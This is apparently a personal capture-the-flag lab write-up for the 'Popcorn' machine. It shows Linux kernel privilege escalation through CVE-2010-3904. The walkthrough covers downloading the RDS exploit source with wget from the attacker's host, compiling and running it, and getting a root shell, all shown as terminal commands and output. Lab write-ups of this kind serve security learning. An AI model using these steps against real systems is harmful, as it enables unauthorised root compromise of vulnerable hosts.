InfoSec LAB

Popcorn_Privilege_Escalation_3

Created: 2 min read

PEAS has discovered that the target system is vulnerable to CVE-2010-3904

CVE-2010-3904

a vulnerability classified as critical was found in linux kernel 2.6.16.9 (Operating System). This vulnerability affects the function rds_page_copy_user. The manipulation with an unknown input leads to a input validation vulnerability. The CWE definition for the vulnerability is CWE-20. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. As an impact it is known to affect confidentiality, integrity, and availability.

exploit (rds)

The exploit was found online. I will download the x86 version of the exploit

Exploitation

www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/CVE-2010-3904/rds.c 
--2023-02-02 14:36:28--  http://10.10.14.5:8000/CVE-2010-3904/rds.c
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 6871 (6.7K) [text/x-csrc]
saving to: `rds.c'
 
100%[======================================>] 6,871       --.-K/s   in 0.03s   
 
2023-02-02 14:36:28 (241 KB/s) - `rds.c' saved [6871/6871]

Delivery complete

www-data@popcorn:/dev/shm$ gcc rds.c -o rds

Compile

www-data@popcorn:/dev/shm$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc089b908
 [+] Resolved default_security_ops to 0xc075e2a0
 [+] Resolved cap_ptrace_traceme to 0xc02caf30
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
popcorn
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:b9:f3:bb brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.6/24 brd 10.10.10.255 scope global eth0
    inet6 dead:beef::250:56ff:feb9:f3bb/64 scope global dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:f3bb/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks